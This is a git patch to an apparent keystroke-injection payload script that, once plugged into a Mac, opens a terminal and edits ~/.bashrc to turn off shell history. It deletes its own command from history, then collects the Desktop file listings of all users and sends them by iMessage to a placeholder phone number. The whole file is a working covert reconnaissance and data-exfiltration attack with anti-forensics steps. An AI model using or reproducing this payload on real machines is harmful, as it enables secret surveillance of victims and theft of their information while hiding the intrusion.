From 8683eefd1a17a0e79f460c36863561343fede8aa Mon Sep 17 00:00:00 2001 From: Narsty Date: Fri, 23 Jun 2023 20:39:39 -0500 Subject: [PATCH] Update Desktop file list to iPhone.txt --- RECON/Desktop file list to iPhone.txt | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/RECON/Desktop file list to iPhone.txt b/RECON/Desktop file list to iPhone.txt index 3fbc11c..42caaa7 100644 --- a/RECON/Desktop file list to iPhone.txt +++ b/RECON/Desktop file list to iPhone.txt @@ -19,7 +19,13 @@ STRING terminal DELAY 1000 ENTER DELAY 500 -STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER ENTER DELAY 500 STRING x=$(ls /Users/*/Desktop); osascript -e 'tell application "Messages" to send "'$x'" to buddy "Phone Number HERE"'